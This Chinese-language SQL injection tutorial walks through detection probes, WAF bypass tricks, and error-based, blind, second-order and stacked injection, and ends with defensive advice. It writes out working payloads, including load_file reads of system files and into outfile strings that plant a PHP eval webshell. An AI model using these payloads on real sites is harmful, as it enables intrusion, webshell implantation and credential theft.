您好,登錄后才能下訂單哦!
SQL注入該如何理解,相信很多沒(méi)有經(jīng)驗(yàn)的人對(duì)此束手無(wú)策,為此本文總結(jié)了問(wèn)題出現(xiàn)的原因和解決方法,通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。
SQL是什么?
結(jié)構(gòu)化查詢語(yǔ)?(Structured Query Language ,SQL),是?種特殊的編程語(yǔ)?,?于數(shù)據(jù)庫(kù)的標(biāo)準(zhǔn)數(shù)據(jù)查詢。1986 年10 ?美國(guó)國(guó)家標(biāo)準(zhǔn)協(xié)會(huì)對(duì)SQL 進(jìn)?了規(guī)范后,以此作為關(guān)系型數(shù)據(jù)庫(kù)系統(tǒng)的標(biāo)準(zhǔn)語(yǔ)?。1987 年得到了國(guó)際標(biāo)準(zhǔn)組織的?持,成為了國(guó)際標(biāo)準(zhǔn)。
SQL注入是服務(wù)端未嚴(yán)格校驗(yàn)客戶端發(fā)送的數(shù)據(jù),而導(dǎo)致服務(wù)端SQL語(yǔ)句被惡意修改并成功執(zhí)行的行為
SQL 注?的攻擊?為可以描述為通過(guò)?戶可控參數(shù)中注?SQL 語(yǔ)法,破壞原有SQL 結(jié)構(gòu),達(dá)到編寫程序時(shí)意料之外結(jié)果的攻擊?為。其成因可以歸結(jié)為以下兩個(gè)原因疊加造成的。
程序員在處理程序和數(shù)據(jù)庫(kù)交互時(shí),使?字符串拼接的?式構(gòu)造SQL 語(yǔ)句
未對(duì)?戶可控參數(shù)進(jìn)??夠的過(guò)濾,便將參數(shù)內(nèi)容拼接到SQL 語(yǔ)句中
用戶能夠控制輸入
是對(duì)于輸入檢查不充分,導(dǎo)致SQL語(yǔ)句將用戶提交的非法數(shù)據(jù)當(dāng)作語(yǔ)句的一部分來(lái)執(zhí)行
代碼對(duì)帶入SQL語(yǔ)句的參數(shù)過(guò)濾不嚴(yán)格
未啟用框架的安全配置,例如:PHP的magic_quotes_gpc
未使用框架安全的查詢方法
測(cè)試接口沒(méi)有刪除
未啟用防火墻
未使用其他的安全防護(hù)設(shè)備
根據(jù)SQL 注?漏洞的原理,?戶“可控參數(shù)”中注?SQL 與發(fā),也就是說(shuō)Web 應(yīng)?獲取?戶輸?的地?,只要帶?數(shù)據(jù)庫(kù)查詢,都有存在SQL 注?的可能,這些地?通常包括:
GET 數(shù)據(jù)
POST 數(shù)據(jù)
Cookie 數(shù)據(jù)
HTTP 頭部(HTTP 頭部中的其他字段)
數(shù)據(jù)庫(kù)信息泄漏、獲取、修改敏感數(shù)據(jù):數(shù)據(jù)庫(kù)中存放的用戶的隱私信息(帳號(hào)、密碼)的泄露
繞過(guò)登錄驗(yàn)證:使用萬(wàn)能密碼登錄網(wǎng)站后臺(tái)等
文件系統(tǒng)操作:列目錄,讀取、寫入文件等
網(wǎng)頁(yè)篡改:通過(guò)操作數(shù)據(jù)庫(kù)對(duì)特定網(wǎng)頁(yè)進(jìn)行篡改,嵌入網(wǎng)馬鏈接,進(jìn)行掛馬攻擊
注冊(cè)表操作:讀取、寫入、刪除注冊(cè)表等
執(zhí)行系統(tǒng)命令:遠(yuǎn)程執(zhí)行命令
服務(wù)器被遠(yuǎn)程控制、種植木馬:黑客可以修改或控制操作系統(tǒng)
提交方法有:get、post、cookie、request等
其中:request支持度較好,你把參數(shù)以get方式、post方式、cookie方式提交都是可以的
會(huì)在疑似注?點(diǎn)的地?或者參數(shù)后?嘗試提交數(shù)據(jù),從而進(jìn)?判斷是否存在SQL 注?漏洞。
測(cè)試數(shù)據(jù) | 測(cè)試判斷 | 攻擊思路 |
---|---|---|
-1或+1 | 是否能夠回顯上?個(gè)或者下?個(gè)頁(yè)面(判斷是否有回顯) | 聯(lián)合注入 |
' 或" | 是否顯示數(shù)據(jù)庫(kù)錯(cuò)誤信息;回顯的頁(yè)面是否不同(字符型還是數(shù)字型) | 報(bào)錯(cuò)注入 |
and 1=1 或者 and 1=2 | 回顯的頁(yè)面是否不同(判斷頁(yè)面是否有布爾類型的狀態(tài)) | 布爾盲注 |
and sleep(5) | 判斷頁(yè)面的返回時(shí)間 | 延時(shí)注入 |
\ | 判斷轉(zhuǎn)義 | |
注意:如果你對(duì)著一個(gè)網(wǎng)站測(cè)試的時(shí)候,出現(xiàn)404,或者頁(yè)面跳轉(zhuǎn),說(shuō)明網(wǎng)站有防護(hù)
如下圖,一般來(lái)說(shuō),id之類的參數(shù)后面跟的是數(shù)字型(也有可能是字符型),別的參數(shù)后面跟的是字符型
大小寫繞過(guò)
雙寫關(guān)鍵字繞過(guò)
特殊編碼繞過(guò)
如果有些字符串確實(shí)被限制的很嚴(yán)格,我們可以嘗試一些編碼繞過(guò)。
如URLEncode編碼,ASCII、HEX、unicode編碼繞過(guò):
or 1=1即%6f%72%20%31%3d%31,
Test也可以為CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
空格過(guò)濾繞過(guò)
過(guò)濾函數(shù)繞過(guò)
sleep() ——> benchmark()
substr()、substring()、mid()可以相互替換
user() ——> @@user() 、datadir ——> @@datadir
ord() ——> ascii() :這兩個(gè)函數(shù)在處理英文時(shí)效果一樣,但處理中文時(shí)效果不一樣
ascii ——> hex()、bin():替代之后再使用對(duì)應(yīng)的進(jìn)制轉(zhuǎn)string即可
group_concat() ——> concat_ws()
內(nèi)聯(lián)注釋繞過(guò)/*!...*/
在MySQL里,/**/是多行注釋,這個(gè)是SQL的標(biāo)準(zhǔn),但是MySQL擴(kuò)張了解釋的功能,如果在開(kāi)頭的的/*后頭加了感嘆號(hào)/*!50001sleep(3)*/
,那么此注釋里的語(yǔ)句將被執(zhí)行。
/*!50001 select * from test */;
這里的50001表示假如 數(shù)據(jù)庫(kù)是5.00.01以上版本,該語(yǔ)句才會(huì)被執(zhí)行,對(duì)于有些waf我們可以通過(guò)這種方式進(jìn)行繞過(guò)。
路徑常見(jiàn)獲取方法:
報(bào)錯(cuò)顯示
遺留文件
別用百度,用谷歌搜索inurl:phpinfo.php
漏洞報(bào)錯(cuò)、平臺(tái)配置文件、爆破等
可以利用SQL 注入漏洞進(jìn)行文件讀寫。
利用的前提條件:
這里涉及到1個(gè)變量secure_file_priv
,該參數(shù)在高版本的 mysql 數(shù)據(jù)庫(kù)中限制了文件的導(dǎo)入導(dǎo)出操作。若要配置此參數(shù),需要修改 my.ini 配置文件,并重啟 mysql 服務(wù)【其在Phpstudy中默認(rèn)是NULL,不允許讀寫文件】
參數(shù) | 含義 |
---|---|
secure_file_priv=NULL | 限制mysqld 不允許導(dǎo)入導(dǎo)出操作 |
secure_file_priv=‘c:/a/’ | 會(huì)限制mysqld 的導(dǎo)入導(dǎo)出操作在某個(gè)固定目錄下,并且子目錄有效 |
secure_file_priv= | 不對(duì)mysqld 的導(dǎo)入導(dǎo)出操作做限制 |
修改配置文件,對(duì)讀寫不做限制,文件路徑C:\phpStudy\MySQL\my.ini
,該操作比較敏感,需要在mysql的配置文件中操作,在phpmyadmin網(wǎng)頁(yè)中不能修改
獲知當(dāng)前用戶和主機(jī)名
?id=-1'union select 1,current_user(),3 --+
查看有無(wú)權(quán)限
?id=-1' union select 1,File_priv,3 from mysql.user where user="root" and host="localhost"--+
方法2:
select File_priv from mysql.user where user="root" and host="localhost";
讀取文件,使用 load_file
下面兩種方法一樣
?id=1' and 1=2 union select 1,load_file('c:\\windows\\system32\\drivers\\etc\\hosts'),3 --+ ?id=1' and 1=2 union select 1,load_file('c:/windows/system32/drivers/etc/hosts'),3 --+
寫入文件,使用 into_outfile
這里需要注意,寫16進(jìn)制是直接寫,寫明文的話,需要用引號(hào)給包住
寫phpinfo,沒(méi)有報(bào)錯(cuò)就說(shuō)明寫入成功,可以直接訪問(wèn)寫入的文件地址
# 1. 直接寫 ?id=-1' union select 1,'<?php phpinfo();?>',3 into outfile 'c:\\phpstudy\\www\\hack.php'--+ # 2. 改寫成16進(jìn)制 ?id=1' and 1=2 union select 1,0x3c3f70687020706870696e666f28293b3f3e,3 into outfile 'c:/phpstudy/www/hack.php' --+
寫一句話木馬
# 1. 直接寫 ?id=1' and 1=2 union select 1,'<?=@eval($_REQUEST[404])?>',3 into outfile 'c:/phpstudy/www/hack1.php' --+ # 2. 改寫成16進(jìn)制 ?id=1' and 1=2 union select 1,0x3c3f3d406576616c28245f524551554553545b3430345d293f3e,3 into outfile 'c:/phpstudy/www/hack1.php' --+
在進(jìn)行SQL注入時(shí),有很多注入會(huì)出現(xiàn)無(wú)回顯的情況,其中不回顯的原因可能是SQL語(yǔ)句查詢方式的問(wèn)題導(dǎo)致,這個(gè)時(shí)候我們需要用到相關(guān)的報(bào)錯(cuò)或盲注進(jìn)行后續(xù)操作,同時(shí)作為手工注入,提前了解或預(yù)知其SQL語(yǔ)句的大概寫法也能更好的選擇對(duì)應(yīng)的注入語(yǔ)句。
更詳細(xì)的介紹,請(qǐng)參見(jiàn)下一篇文章 《SQL注入的常見(jiàn)方式》
重點(diǎn)理解:我們可以通過(guò)下面的查詢方式和網(wǎng)站應(yīng)用的關(guān)系、注入點(diǎn)產(chǎn)生地方、應(yīng)用猜測(cè)到對(duì)方的SQL查詢方式
查詢方法舉例說(shuō)明
select:查詢數(shù)據(jù)在網(wǎng)站應(yīng)用中進(jìn)行數(shù)據(jù)顯示查詢操作
舉例:select * from news where id=$id
insert:插入數(shù)據(jù)在網(wǎng)站應(yīng)用中進(jìn)行用戶注冊(cè)添加等操作
舉例:insert into news(id,url,text) values(2,'x','$t')
delete:刪除數(shù)據(jù)后臺(tái)管理里面刪除文章刪除用戶等操作
舉例:delete from news where id=$id
update更新數(shù)據(jù)會(huì)員或后臺(tái)中心數(shù)據(jù)同步或緩存等操作
舉例:update user set pwd='$p' where id=2 and username='admin'
order by排序數(shù)據(jù)一般結(jié)合表名或列名進(jìn)行數(shù)據(jù)排序操作
舉例:select * from news order by $id
舉例:select id,name,price from news order by $order
盲注就是在注入過(guò)程中,獲取的數(shù)據(jù)不能回顯至前端頁(yè)面。此時(shí),我們需要利用一些方法進(jìn)行判斷或者嘗試。
這個(gè)過(guò)程稱之為盲注。我們可以知道盲注分為以下三類:
基于布爾的SQL盲注-邏輯判斷(不回顯)
regexp,like,ascii,left,ord,mid
基于時(shí)間的SQ盲注-延時(shí)判斷(不回顯)
if,sleep
基于報(bào)錯(cuò)的SQL盲注-(強(qiáng)制)報(bào)錯(cuò)回顯
floor,updatexml,extractvalue
報(bào)錯(cuò)模板:https://www.jianshu.com/p/bc35f8dd4f7c
floor()
floor(x),返回小于或等于x的最大整數(shù)。
payload:select conut(*),(concat(database(),rand(0)*2))x from infromation_schema.tables group by x;
x表示concat(database(),rand(0)*2),rand(0)以0為隨機(jī)種子產(chǎn)生0-1之間的隨機(jī)數(shù),*2產(chǎn)生0-2之間的隨機(jī)數(shù)。
報(bào)錯(cuò)原因:主鍵重復(fù),必需:count()、rand()、group by
分析鏈接:https://xz.aliyun.com/t/253#toc-2
exp()
exp(x)返回e^x。
當(dāng)x的值足夠大的時(shí)候就會(huì)導(dǎo)致函數(shù)的結(jié)果數(shù)據(jù)類型溢出,也就會(huì)因此報(bào)錯(cuò)
payload:id =1 and EXP(~(SELECT * from(select user())a))
updatexml()
利用的就是mysql函數(shù)參數(shù)格式錯(cuò)誤進(jìn)行報(bào)錯(cuò)注入。
updatexml()函數(shù)語(yǔ)法:updatexml(XML_document,Xpath_string,new_value);
函數(shù)語(yǔ)法解析:
XML_document:是字符串String格式,為XML文檔對(duì)象名稱
Xpath_string:Xpath格式的字符串
new_value:string格式,替換查找到的符合條件的數(shù)據(jù)
適用版本是:5.1.5+
利用方式:在執(zhí)行兩個(gè)函數(shù)時(shí),如果出現(xiàn)xml文件路徑錯(cuò)誤,就會(huì)產(chǎn)生報(bào)錯(cuò) 那么我們就需要構(gòu)造Xpath_string格式錯(cuò)誤,也就是我們將Xpath_string的值傳遞成不符合格式的參數(shù),mysql就會(huì)報(bào)錯(cuò)
extractvalue()
利用的原理是xpath格式不符報(bào)錯(cuò)注入。
函數(shù)語(yǔ)法:extractvalue(XML_document,XPath_string)
適用的版本:5.1.5+
1. 獲取當(dāng)前是數(shù)據(jù)庫(kù)名稱及使用mysql數(shù)據(jù)庫(kù)的版本信息: and extractvalue(1,concat(0x7e,database(),0x7e,version(),0x7e)) 2. 獲取當(dāng)前注入點(diǎn)的用戶權(quán)限信息及操作系統(tǒng)版本信息: and extractvalue(1,concat(0x7e,@@version_compile_os,0x7e,user(),0x7e)) 3. 獲取當(dāng)前位置所用數(shù)據(jù)庫(kù)的位置: and extractvalue(1,concat(0x7e,@@datadir,0x7e)) 4. 獲取數(shù)據(jù)表信息: and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) 5. 獲取users數(shù)據(jù)表的列名信息: and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e)) 6. 獲取對(duì)應(yīng)的列名的信息(username\password): and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))
二次注入漏洞是一種在Web應(yīng)用程序中廣泛存在的安全漏洞形式。相對(duì)于一次注入漏洞而言,二次注入漏洞更難以被發(fā)現(xiàn),但是它卻具有與一次注入攻擊漏洞相同的攻擊威力。
二次注入的原理:在第一次進(jìn)行數(shù)據(jù)庫(kù)插入數(shù)據(jù)的時(shí)候,僅僅只是使用了 addslashes
或者是借助 get_magic_quotes_gpc
對(duì)其中的特殊字符進(jìn)行了轉(zhuǎn)義,但是addslashes
有一個(gè)特點(diǎn)就是雖然參數(shù)在過(guò)濾后會(huì)添加\
進(jìn)行轉(zhuǎn)義,但是\
并不會(huì)插入到數(shù)據(jù)庫(kù)中,在寫入數(shù)據(jù)庫(kù)的時(shí)候還是保留了原來(lái)的數(shù)據(jù)。
在將數(shù)據(jù)存入到了數(shù)據(jù)庫(kù)中之后,開(kāi)發(fā)者就認(rèn)為數(shù)據(jù)是可信的。在下一次進(jìn)行需要進(jìn)行查詢的時(shí)候,直接從數(shù)據(jù)庫(kù)中取出了臟數(shù)據(jù),沒(méi)有進(jìn)行進(jìn)一步的檢驗(yàn)和處理,這樣就會(huì)造成SQL的二次注入。比如在第一次插入數(shù)據(jù)的時(shí)候,數(shù)據(jù)中帶有單引號(hào),直接插入到了數(shù)據(jù)庫(kù)中;然后在下一次使用中在拼湊的過(guò)程中,就形成了二次注入。
插入惡意數(shù)據(jù)
第一次進(jìn)行數(shù)據(jù)庫(kù)插入數(shù)據(jù)的時(shí)候,僅僅對(duì)其中的特殊字符進(jìn)行了轉(zhuǎn)義,在寫入數(shù)據(jù)庫(kù)的時(shí)候還是保留了原來(lái)的數(shù)據(jù),但是數(shù)據(jù)本身包含惡意內(nèi)容
引用惡意數(shù)據(jù)
這里使用的是sql-libs靶場(chǎng)的第24關(guān)
首先看一下最開(kāi)始的時(shí)候,靶機(jī)的數(shù)據(jù)庫(kù)是什么樣子的,這里以其中的用戶dhakkan來(lái)演示
注冊(cè)一個(gè)新用戶
注冊(cè)了一個(gè)新用戶之后的數(shù)據(jù)庫(kù)如下
新用戶登錄,并重置密碼
查看數(shù)據(jù)庫(kù),有意思的事情發(fā)生了,dhakkan的密碼改變了,但是新用戶的密碼沒(méi)有改變
在第24關(guān)的源代碼中,可以看到原因,如下圖
堆疊注入(Stacked injections),從名詞的含義就可以看到應(yīng)該是一堆sql語(yǔ)句(多條)一起執(zhí)行。而在真實(shí)的運(yùn)用中也是這樣的,我們知道在mysql中,主要是命令行中,每一條語(yǔ)句結(jié)尾加 ;
表示語(yǔ)句結(jié)束。這樣我們就想到了是不是可以多句一起使用。于是出現(xiàn)了堆疊注入(又稱堆疊查詢)
注意事項(xiàng):
堆疊注入的使用條件十分有限,其可能受到API或者數(shù)據(jù)庫(kù)引擎,又或者權(quán)限的限制只有當(dāng)調(diào)用數(shù)據(jù)庫(kù)函數(shù)支持執(zhí)行多條sql語(yǔ)句時(shí)才能夠使用,利用mysqli_multi_query()函數(shù)就支持多條sql語(yǔ)句同時(shí)執(zhí)行,但實(shí)際情況中,如PHP為了防止sql注入機(jī)制,往往使用調(diào)用數(shù)據(jù)庫(kù)的函數(shù)是mysqli_ query()函數(shù),其只能執(zhí)行一條語(yǔ)句,分號(hào)后面的內(nèi)容將不會(huì)被執(zhí)行,所以可以說(shuō)堆疊注入的使用條件十分有限,一旦能夠被使用,將可能對(duì)網(wǎng)站造成十分大的威脅
DNSlog 就是存儲(chǔ)在 DNS Server 上的域名信息,它記錄著用戶對(duì)域名 www.baidu.com 等的訪問(wèn)信息,類似日志文件。更多操作參見(jiàn)淺析DNSlog在滲透測(cè)試中的實(shí)戰(zhàn)技巧
MySQL、SQLServer、Oracle、PostgreSQL、Access五種數(shù)據(jù)庫(kù)應(yīng)該是目前市面上最流行的數(shù)據(jù)庫(kù)了。我們進(jìn)行滲透測(cè)試,碰到最多的也是這幾種數(shù)據(jù)庫(kù)。本文就這幾種數(shù)據(jù)庫(kù)在注入時(shí)的相同點(diǎn)和不同的做一下統(tǒng)計(jì)。
MySQL | SQLServer | Oracle | PostgreSQL | Access | |
---|---|---|---|---|---|
單行注釋 | # | -- | -- | -- | 無(wú) |
多行注釋 | /**/ | /**/ | /**/ | /**/ | 無(wú) |
數(shù)據(jù)庫(kù)端口 | 3306 | 1433 | 1521 | 5432 | 屬于文件型數(shù)據(jù)庫(kù),所以不需要端口號(hào) |
MySQL:數(shù)據(jù)文件:.myd
、索引文件:.MYI
、表定義文件:.frm
SQLServer:.mdf
Oracle:.dbf
和 .ora
PostgreSQL:無(wú)后綴名
Access:Office 2007之前是 .mdb
,Office 2007及之后是.accdb
MySQL: information_schema(Mysql5.0以上的版本)
SQLServer:sysobjects
Oracle:dual
PostgreSQL:
Access:msysobjects
MySQL
查詢當(dāng)前用戶 select user(); select substring_index(user(), '@', 1) ; 查詢當(dāng)前用戶的權(quán)限 select * from mysql.user where user = substring_index(user(), '@', 1) ;
SQLServer
判斷是否是SA權(quán)限select is_srvrolemember('sysadmin') 判斷是否是db_owner權(quán)限 select is_member('db_owner')判斷是否是public權(quán)限select is_srvrolemember('public')
Oracle
查看當(dāng)前用戶select * from user_users;查看當(dāng)前用戶擁有的角色 select * from session_roles;查看當(dāng)前用戶擁有的權(quán)限select * from session_privs;
PostgreSQL
select user #查看用戶select current_user #查看當(dāng)前用戶
ACCESS
Access數(shù)據(jù)庫(kù)是文件類型數(shù)據(jù)庫(kù),沒(méi)有用戶和權(quán)限的概念
MySQL:select char(97)
SQLServer:select char(97)
Oracle:select chr(97) from dual
**PostgreSQL:select chr(97) **
**Access:select chr(97) **
select chr(97)&chr(100)&chr(109)&chr(105)&chr(110)
mssql
MySQL
oracle
在select數(shù)據(jù)時(shí),我們往往需要將數(shù)據(jù)進(jìn)行連接后進(jìn)行回顯。很多的時(shí)候想將多個(gè)數(shù)據(jù)或者多行數(shù)據(jù)進(jìn)行輸出的時(shí)候,需要使用字符串連接函數(shù)。在sqli中,常見(jiàn)的字符串連接函數(shù)有concat()
,group_concat()
,concat_ws()
。
本篇詳細(xì)講解以上三個(gè)函數(shù)。同時(shí)此處用mysql進(jìn)行說(shuō)明,其他類型數(shù)據(jù)庫(kù)請(qǐng)自行進(jìn)行檢測(cè)。
不使用字符串連接函數(shù)時(shí):
但是這里存在的一個(gè)問(wèn)題是,當(dāng)使用union聯(lián)合注入時(shí),我們都知道,聯(lián)合注入要求前后兩個(gè)選擇的列數(shù)要相同,這里id,username是兩個(gè)列,當(dāng)我們要一個(gè)列的時(shí)候,(當(dāng)然不排除你先爆出id,再爆出username,分兩次的做法)該怎么辦?答案就是concat()
concat()
語(yǔ)法及使用特點(diǎn):CONCAT(str1,str2,…)
返回結(jié)果為連接參數(shù)產(chǎn)生的字符串。如有任何一個(gè)參數(shù)為NULL ,則返回值為 NULL??梢杂幸粋€(gè)或多個(gè)參數(shù)。
示例如下:
使用方法:CONCAT_WS(separator,str1,str2,...)
CONCAT_WS()
代表 CONCAT With Separator ,是CONCAT()
的特殊形式。第一個(gè)參數(shù)是其它參數(shù)的分隔符。分隔符的位置放在要連接的兩個(gè)字符串之間。分隔符可以是一個(gè)字符串,也可以是其它參數(shù)。
注意:如果分隔符為 NULL,則結(jié)果為 NULL。函數(shù)會(huì)忽略任何分隔符參數(shù)后的 NULL 值。
這里以逗號(hào)分隔符為例,演示一下
基本查詢
mysql> select * from aa; +------+------+ | id| name | +------+------+ |1 | 10| |1 | 20| |1 | 20| |2 | 20| |3 | 200 | |3 | 500 | +------+------+ 6 rows in set (0.00 sec)
以id分組,把name字段的值打印在一行,逗號(hào)分隔(默認(rèn))
mysql> select id,group_concat(name) from aa group by id; +------+--------------------+ | id| group_concat(name) | +------+--------------------+ |1 | 10,20,20| |2 | 20 | |3 | 200,500| +------+--------------------+ 3 rows in set (0.00 sec)
以id分組,把name字段的值打印在一行,分號(hào)分隔
mysql> select id,group_concat(name separator ';') from aa group by id; +------+----------------------------------+ | id| group_concat(name separator ';') | +------+----------------------------------+ |1 | 10;20;20 | |2 | 20| |3 | 200;500 | +------+----------------------------------+ 3 rows in set (0.00 sec)
以id分組,把去冗余的name字段的值打印在一行,
逗號(hào)分隔
mysql> select id,group_concat(distinct name) from aa group by id; +------+-----------------------------+ | id| group_concat(distinct name) | +------+-----------------------------+ |1 | 10,20| |2 | 20 | |3 | 200,500 | +------+-----------------------------+ 3 rows in set (0.00 sec)
以id分組,把name字段的值打印在一行,逗號(hào)分隔,以name排倒序
mysql> select id,group_concat(name order by name desc) from aa group by id; +------+---------------------------------------+ | id| group_concat(name order by name desc) | +------+---------------------------------------+ |1 | 20,20,10 | |2 | 20| |3 | 500,200| +------+---------------------------------------+ 3 rows in set (0.00 sec)
數(shù)據(jù)庫(kù)結(jié)構(gòu):數(shù)據(jù)庫(kù) —> 表名 —> 列名 —> 數(shù)據(jù)
演示如下:
查看MySQL數(shù)據(jù)庫(kù)中,包含了哪些數(shù)據(jù)庫(kù)
show database;
查看數(shù)據(jù)庫(kù)中有哪些表
use dvwa; # 選中dvwa數(shù)據(jù)庫(kù) show tables; # 查看dvwa數(shù)據(jù)庫(kù)中有哪些表
查詢表中的內(nèi)容
查看user表中的全部?jī)?nèi)容:select * from user;
以列的形式查看user表中的全部?jī)?nèi)容:select *from user\G;
查看表中的部分內(nèi)容:select user,password from user;
減減空格 | "-- " | "–%20" | “–+” |
---|---|---|---|
# | “#” | "%23" | |
內(nèi)聯(lián)注釋 | /* 被注釋掉的內(nèi)容 */ | ||
數(shù)據(jù)庫(kù)中,符號(hào).
代表下一級(jí),如dvwa.user表示dvwa數(shù)據(jù)庫(kù)下的user表
推薦閱讀:SQL注入必備知識(shí)初級(jí)
1:mysql -uroot -proot登錄數(shù)據(jù)庫(kù)
2:show databases; 查看有哪些數(shù)據(jù)庫(kù)
3:use informatin_schema; 使用某數(shù)據(jù)庫(kù)
4:limit的用法
limit的使用格式是limit m,n
其中m是指記錄開(kāi)始的位置,從0開(kāi)始表示第一條記錄
n是指提取n條記錄
5:select 函數(shù)名; 查詢某內(nèi)容
函數(shù)名有以下:
防御SQL注入的核心思想是對(duì)用戶輸入的數(shù)據(jù)進(jìn)行嚴(yán)格的檢查,并且對(duì)數(shù)據(jù)庫(kù)的使用采用最小權(quán)限分配原則。目前SQL注入的防御手段有以下幾種:
內(nèi)置過(guò)濾系統(tǒng)(本質(zhì)是黑名單,很常見(jiàn)但是不推薦)
采用參數(shù)化查詢&預(yù)編譯(推薦)
強(qiáng)迫使用參數(shù)化語(yǔ)句。參數(shù)化的語(yǔ)句使用參數(shù)而不是將用戶輸入變量嵌入到SQL語(yǔ)句中。采用這種措施,可以杜絕大部分的SQL注入式攻擊
采用框架的安全寫法
例如Mybatis中使用#
可以防止SQL注入,$
并不能防止SQL注入
thinkphp使用數(shù)組方式將自動(dòng)使用框架自帶的字段類型檢測(cè)防止注入、PDO驅(qū)動(dòng)參數(shù)綁定、預(yù)處理等
Thinkphp框架的安全寫法 安全的替換寫法 $data=M('Member')->where(array('id'=>$_GET['id']))->find();//使用數(shù)組方式將自動(dòng)使用框架自帶的字段類型檢測(cè)防止注入 $data=M('Member')->where(array('id'=>(int)$_GET['id']))->find();//類型約束 $data=M('Member')->where('id='.intval($_GET['id']))->find();//類型轉(zhuǎn)換 $data=M('Member')->where(array('id'=>I('get.id','','intval')))->find();//$data=M('Member')- >where(array('id'=>':id'))->bind(':id',I('get.id'))->select();//PDO驅(qū)動(dòng)可以使用參數(shù)綁定 $data=M('Member')->where("id=%d",array($_GET['id']))->find();//預(yù)處理機(jī)制 //不安全的寫法舉例 $_GET['id']=8;//希望得到的是正整數(shù) $data=M()->query('SELECT * FROM `member` WHERE id='.$_GET['id']);//執(zhí)行的SQL語(yǔ)句 $_GET['id']='8 UNION SELECT * FROM `member`';;//隱患:構(gòu)造畸形語(yǔ)句進(jìn)行注入;
主要包括:
最小權(quán)限原則,禁止將任何高權(quán)限帳戶(例如sa、dba、root等)用于應(yīng)用程序數(shù)據(jù)庫(kù)訪問(wèn)。更安全的方法是單獨(dú)為應(yīng)用創(chuàng)建有限訪問(wèn)帳戶。
禁用敏感函數(shù)拒絕用戶訪問(wèn)敏感的系統(tǒng)存儲(chǔ)過(guò)程,如xp_dirtree、xp_cmdshell、into_outfile 等
網(wǎng)站與數(shù)據(jù)層的編碼統(tǒng)一,建議全部使用UTF-8編碼,避免因上下層編碼不一致導(dǎo)致一些過(guò)濾模型被繞過(guò),比如寬字節(jié)注入等。
限制用戶所能夠訪問(wèn)的數(shù)據(jù)庫(kù)表
例如,避免網(wǎng)站顯示SQL執(zhí)行出錯(cuò)信息,防止攻擊者使用基于錯(cuò)誤的方式進(jìn)行注入;每個(gè)數(shù)據(jù)層編碼統(tǒng)一,防止過(guò)濾模型被繞過(guò)等。使用WAF。
看完上述內(nèi)容,你們掌握SQL注入該如何理解的方法了嗎?如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容,歡迎關(guān)注億速云行業(yè)資訊頻道,感謝各位的閱讀!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。